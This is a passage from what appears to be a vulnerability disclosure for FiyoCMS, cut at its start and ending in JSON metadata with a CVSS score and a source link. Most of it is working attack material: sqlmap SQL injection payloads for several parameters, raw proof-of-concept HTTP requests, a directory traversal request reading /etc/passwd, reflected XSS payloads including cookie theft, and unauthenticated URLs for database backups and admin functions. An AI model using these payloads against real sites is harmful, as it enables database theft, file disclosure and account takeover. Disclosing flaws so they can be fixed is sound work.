'Pqqp'='Pqqp&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \nType: UNION query \nTitle: MySQL UNION query (NULL) - 10 columns \nPayload: cat=&user=&level=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71666f7671,0x6163446a67456e557a48,0x7164687671),NULL,NULL,NULL#&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \nType: AND/OR time-based blind \nTitle: MySQL < 5.0.12 AND time-based blind (heavy query) \nPayload: cat=&user=&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hMLH'='hMLH&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \n \nParameter: user \nType: error-based \nTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clause \nPayload: cat=&user=' AND (SELECT 8990 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (8990=8990) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VhKM'='VhKM&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \nType: UNION query \nTitle: MySQL UNION query (NULL) - 10 columns \nPayload: cat=&user=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4652577247546e6b5241,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \nType: AND/OR time-based blind \nTitle: MySQL < 5.0.12 AND time-based blind (heavy query) \nPayload: cat=&user=' AND 1262=BENCHMARK(5000000,MD5(0x72797451)) AND 'egJe'='egJe&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \n* PoC: \nPOST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1 \nHost: 192.168.248.132 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nReferer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add \nContent-Length: 42 \nCookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off \nConnection: keep-alive \nPragma: no-cache \nCache-Control: no-cache \n \nact=email&email=test@asdas.com[sqli] \n \n* Sqlmap: \n \nParameter: email \nType: boolean-based blind \nTitle: AND boolean-based blind - WHERE or HAVING clause \nPayload: act=email&email=test@asdas.com' AND 5514=5514 AND 'KTqH'='KTqH \n \nType: AND/OR time-based blind \nTitle: MySQL > 5.0.11 AND time-based blind \nPayload: act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT \n \n* PoC: \n \nPOST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1 \nHost: 192.168.248.132 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nReferer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add \nContent-Length: 34 \nCookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off \nConnection: keep-alive \nPragma: no-cache \nCache-Control: no-cache \n \nact=user&username=test[sqli] \n \n* Sqlmap: \n \nParameter: username \nType: boolean-based blind \nTitle: AND boolean-based blind - WHERE or HAVING clause \nPayload: act=user&username=test' AND 5514=5514 AND 'KTqH'='KTqH \n \nType: AND/OR time-based blind \nTitle: MySQL > 5.0.11 AND time-based blind \nPayload: act=user&username=test' AND SLEEP(5) AND 'UjqT'='UjqT \n \n-------------------------------------------------------------------- \nDirectory Traversal - kcfinder plugins - CVE-2014-1222 \n-------------------------------------------------------------------- \n \nFiyoCMS was identified to be using an outdated KCFinder plugin which vulnerable to directory traversal attack. \n \nPOST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1 \nHost: 192.168.248.132 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://192.168.248.132/fiyo//plugins/plg_kcfinder/browse.php?type=files \nCookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 34 \n \ndir=files&file=../../../../../../../etc/passwd \n \n---------------------------------------------------- \nReflected XSS - CVE-2014-9146 \n---------------------------------------------------- \n \nhttp://192.168.248.132/fiyo/?app=article&view=item31ab2\"><script>alert(1)</script>0ccba&id=186 \nhttp://192.168.248.132/fiyo/?app=article&view=item&id=18690fdb\"><script>alert(1)</script>d99c9 \nhttp://192.168.248.132/fiyo/?page=5eac15eac1\"><script>alert(1)</script>774f2 \nhttp://192.168.248.132/fiyo/?app=article95ce1\"><script>alert(1)</script>298ab&view=item&id=186 \nhttp://192.168.248.132/fiyo/dapur/index.php?app=module&act=edit%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=5 \n \n \n---------------------------------------------------- \nDirect URL Access - CVE-2014-9147 \n---------------------------------------------------- \nTo download database backup without any authentications required. \nhttp://192.168.248.132/fiyo/.backup/[db_backup.sql filename] \n \n---------------------------------------------------- \nAccess Control Bypass - CVE-2014-9148 \n---------------------------------------------------- \n \nTo access super administrator functions \"Install & Update\" and \"Backup\" by administrator user, just go directly to the URL below: \n1. http://192.168.248.132/fiyo/dapur/?app=config&view=backup \n2. http://192.168.248.132/fiyo/dapur/?app=config&view=install \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131165/fiyocms-sqlxssbypass.txt"}]}
